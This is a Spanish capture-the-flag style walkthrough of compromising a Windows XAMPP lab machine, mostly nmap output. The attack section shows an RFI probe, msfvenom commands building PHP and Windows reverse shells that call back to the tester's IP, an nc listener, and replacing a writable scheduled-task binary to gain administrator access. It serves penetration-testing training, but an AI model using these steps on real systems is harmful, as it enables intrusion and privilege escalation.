Entre los servicios, se encuentra una aplicación web que cuenta con una ruta /site que redirige a /site/index.php?page=main.php.
En el parámetro page se encuentra que es vulnerable a RFI y se incluye por medio del parámetro una URL con nuestra reverse shell en php.
Se enumera el servidor y se encuentra en la carpeta C:\Backup la información de una tarea que ejecuta un binario llamado TFTP.exe cada 5 minutos y donde vemos que nuestro usuario tiene permisos para modificarlo.
Creamos un EXE con el mismo nombre que el fichero que se ejecuta en la tarea y lo sustituimos en el sistema.
Esperamos hasta que la tarea se ejecute y PWNED! }:)
Enumeración
Escáner con nmap
Enumeración básica de todos los servicios vía TCP, UDP y SCTP:
El segundo escáner (nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP) nos da la siguiente información:
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| vulners:
| cpe:/a:filezilla-project:filezilla_server:0.9.41_beta:
| VMSA-2008-0016.3 10.0 https://vulners.com/vmware/VMSA-2008-0016.3
| VMSA-2008-0014.3 10.0 https://vulners.com/vmware/VMSA-2008-0014.3
| SSV:3950 10.0 https://vulners.com/seebug/SSV:3950 *EXPLOIT*
| SSV:11998 10.0 https://vulners.com/seebug/SSV:11998 *EXPLOIT*
| SAINT:D25EA3A9ECECCE0EAAD76756E80C2619 10.0 https://vulners.com/saint/SAINT:D25EA3A9ECECCE0EAAD76756E80C2619 *EXPLOIT*
| SAINT:98424EE013ADB3A8F0D1BE842CCABF10 10.0 https://vulners.com/saint/SAINT:98424EE013ADB3A8F0D1BE842CCABF10 *EXPLOIT*
| SAINT:630A6964630CDBFFE209380927EB5D13 10.0 https://vulners.com/saint/SAINT:630A6964630CDBFFE209380927EB5D13 *EXPLOIT*
| SAINT:09352C87FBB0235129E935BA72121479 10.0 https://vulners.com/saint/SAINT:09352C87FBB0235129E935BA72121479 *EXPLOIT*
| D2SEC_JAVAWS2 10.0 https://vulners.com/d2/D2SEC_JAVAWS2 *EXPLOIT*
| VMSA-2009-0005 9.3 https://vulners.com/vmware/VMSA-2009-0005
| VMSA-2008-0018 9.3 https://vulners.com/vmware/VMSA-2008-0018
| SSV:5025 9.3 https://vulners.com/seebug/SSV:5025 *EXPLOIT*
| SSV:5005 9.3 https://vulners.com/seebug/SSV:5005 *EXPLOIT*
| SSV:4423 9.3 https://vulners.com/seebug/SSV:4423 *EXPLOIT*
| VMSA-2009-0007 7.5 https://vulners.com/vmware/VMSA-2009-0007
| SSV:3423 7.5 https://vulners.com/seebug/SSV:3423 *EXPLOIT*
| SSV:3166 7.5 https://vulners.com/seebug/SSV:3166 *EXPLOIT*
| PACKETSTORM:64260 7.5 https://vulners.com/packetstorm/PACKETSTORM:64260 *EXPLOIT*
| VMSA-2008-0019.1 7.2 https://vulners.com/vmware/VMSA-2008-0019.1
| SSV:4528 7.2 https://vulners.com/seebug/SSV:4528 *EXPLOIT*
| SSV:3948 7.2 https://vulners.com/seebug/SSV:3948 *EXPLOIT*
| VMSA-2009-0015 6.9 https://vulners.com/vmware/VMSA-2009-0015
| SSV:4422 6.9 https://vulners.com/seebug/SSV:4422 *EXPLOIT*
| SSV:14961 6.9 https://vulners.com/seebug/SSV:14961 *EXPLOIT*
| SSV:12550 6.9 https://vulners.com/seebug/SSV:12550 *EXPLOIT*
| SSV:12541 6.9 https://vulners.com/seebug/SSV:12541 *EXPLOIT*
| VMSA-2009-0006 6.8 https://vulners.com/vmware/VMSA-2009-0006
| SSV:12093 6.8 https://vulners.com/seebug/SSV:12093 *EXPLOIT*
| CLOUDBURST 6.8 https://vulners.com/canvas/CLOUDBURST *EXPLOIT*
| SSV:9178 5.0 https://vulners.com/seebug/SSV:9178 *EXPLOIT*
| SSV:9168 5.0 https://vulners.com/seebug/SSV:9168 *EXPLOIT*
| SSV:9165 5.0 https://vulners.com/seebug/SSV:9165 *EXPLOIT*
| SSV:86539 5.0 https://vulners.com/seebug/SSV:86539 *EXPLOIT*
| SSV:65607 5.0 https://vulners.com/seebug/SSV:65607 *EXPLOIT*
| SSV:3949 5.0 https://vulners.com/seebug/SSV:3949 *EXPLOIT*
| SSV:17308 5.0 https://vulners.com/seebug/SSV:17308 *EXPLOIT*
| PACKETSTORM:68500 5.0 https://vulners.com/packetstorm/PACKETSTORM:68500 *EXPLOIT*
| PACKETSTORM:68473 5.0 https://vulners.com/packetstorm/PACKETSTORM:68473 *EXPLOIT*
| PACKETSTORM:68471 5.0 https://vulners.com/packetstorm/PACKETSTORM:68471 *EXPLOIT*
| EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF 5.0 https://vulners.com/exploitpack/EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF *EXPLOIT*
| EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D *EXPLOIT*
| EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095 5.0 https://vulners.com/exploitpack/EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095 *EXPLOIT*
| EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D *EXPLOIT*
| EDB-ID:6130 5.0 https://vulners.com/exploitdb/EDB-ID:6130 *EXPLOIT*
| EDB-ID:6123 5.0 https://vulners.com/exploitdb/EDB-ID:6123 *EXPLOIT*
| EDB-ID:6122 5.0 https://vulners.com/exploitdb/EDB-ID:6122 *EXPLOIT*
| E-193 5.0 https://vulners.com/dsquare/E-193 *EXPLOIT*
| D2SEC_VMWARE_DIRTRAV 5.0 https://vulners.com/d2/D2SEC_VMWARE_DIRTRAV *EXPLOIT*
| D2SEC_VMWARE 5.0 https://vulners.com/d2/D2SEC_VMWARE *EXPLOIT*
| SSV:11498 4.0 https://vulners.com/seebug/SSV:11498 *EXPLOIT*
|_ SSV:3947 2.1 https://vulners.com/seebug/SSV:3947 *EXPLOIT*
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| GenericLines, JavaRMI, LDAPBindReq, NULL:
|_ Host '192.168.45.5' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:4443/dashboard/
| vulners:
| cpe:/a:apache:http_server:2.4.43:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
| CVE-2022-37436 0.0 https://vulners.com/cve/CVE-2022-37436
| CVE-2022-36760 0.0 https://vulners.com/cve/CVE-2022-36760
|_ CVE-2006-20001 0.0 https://vulners.com/cve/CVE-2006-20001
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /icons/: Potentially interesting folder w/ directory listing
|_ /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5040/tcp open unknown
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:8080/dashboard/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.198.53:8080/dashboard/javascripts/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.198.53:8080/dashboard/javascripts/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.198.53:8080/dashboard/javascripts/?C=D%3BO%3DA%27%20OR%20sqlspider
|_ http://192.168.198.53:8080/dashboard/javascripts/?C=M%3BO%3DA%27%20OR%20sqlspider
| vulners:
| cpe:/a:apache:http_server:2.4.43:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
| CVE-2022-37436 0.0 https://vulners.com/cve/CVE-2022-37436
| CVE-2022-36760 0.0 https://vulners.com/cve/CVE-2022-36760
|_ CVE-2006-20001 0.0 https://vulners.com/cve/CVE-2006-20001
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-open-proxy: Proxy might be redirecting requests
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /icons/: Potentially interesting folder w/ directory listing
|_ /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=3/4%Time=64038037%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(JavaRMI,4B,"G\0
SF:\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/4%OT=21%CT=1%CU=43728%PV=Y%DS=3%DC=T%G=Y%TM=64038244
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=I%TS=U)OPS(O1=M54ENW8
OS:NNS%O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=99A7%RUD=G)IE(R=N)
Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb2-time:
| date: 2023-03-04T17:33:55
|_ start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Análisis del escáner
HTTP - 4443
Entre los servicios detectados, los servicios más comunes, como los servicios web, entre otros (ftp, smb, etc.), suelen ser los de mayor interés y se recomienda analizarlos antes.
http://192.168.198.53:4443/
Enumeración de directorios
Se enumeran los directorios y posibles ficheros con las extensiones html, php y txt utilizando el diccionario directory-list-2.3-medium.txt:
El parámetro page hace referencia a un documento que se encuentra almacenado en el servidor web, y podría ser posible que esta entrada no esté securizada, pudiendo ser vulnerable a LFI (Local File Inclusion | Inclusión de ficheros locales) o RFI (Remote File Inclusion | Inclusión de ficheros remotos).
Como nos sería mucho más útil un RFI, puesto que nos facilitaría poder ejecutar una webshell y/o reverse shell. Probamos primero si pudiera ser vulnerable a RFI.
Primero, probamos con una simple comilla, para observar cómo se comporta con esta entrada:
GET /site/index.php?page=%27 HTTP/1.1
Host: 192.168.205.53:4443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 21:20:55 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Content-Length: 316
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Warning</b>: include('): failed to open stream: No such file or directory in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>: include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />
Efectivamente, el parámetro no se encuentra adecuadamente securizado y vemos que se utiliza la. función PHP include, por lo que vamos a probar a incluir un fichero que se encuentre en nuestro equipo (RFI). En concreto, crearemos una reverse shell y pondremos un puerto a la escucha.
Explotación
RFI - Inclusión remota de ficheros
Ahora que hemos encontrado un posible punto de entrada, creamos nuestra reverse shell.
Friendly reminder: Utilizar siempre que sea posible los puertos 53, 80 o 443. En estos puertos es menos probable que el firewall lo bloquee y tener éxito en la ejecución de la reverse shell.
msfvenom -p php/reverse_php LHOST=192.168.45.5 LPORT=443 -f raw > test.php
Al ejecutarlo, vemos como obtenemos una cmd mejor:
Escalada de privilegios
Antes de recurrir e enumeraciones automatizadas, echamos un vistazo rápido por el sistema y realizamos enumeraciones manuales.
Tarea programada cada 5 minutos
Al acceder a C:\ vemos una carpeta de Backup. Viendo la información de los ficheros, vemos que se ejecuta un EXE cada 5 minutos.
cd C:\ && dir
cd Backup && dir
Binario con permisos de escritura
type backup.txt
type info.txt
Vamos a ver los permisos de ese ejecutable por si pudiéramos tener permisos de escritura para sustituirlo por un ejecutable creado por nosotros.
powershell -c "Get-Acl TFTP.exe | fl"
Creación de binario malicioso
Como tenemos permisos para poder modificar el fichero, creamos un fichero llamado TFTP.exe con msfvenom que contenga nuestra reverse shell y posteriormente lo sustituiremos por el que se encuentra en el sistema.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.45.5 LPORT=80 -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o TFTP.exe
Sustitución y subida del binario malicioso
En la máquina de la víctima, renombramos el fichero TFTP.exe a TFTP.exe.bak para no eliminarlo y descargamos nuestro EXE malicioso.
Recordamos cerrar nuestro python que se encuentra con el servicio HTTP para la descarga del EXE. Y ponemos el puerto 80 a la escucha para obtener nuestra shell:
sudo rlwrap nc -lnvp 80
Esperamos 5 minutos y... PWNED!
type C:\Users\rupert\Desktop\local.txt
type C:\Users\Administrator\Desktop\proof.txt
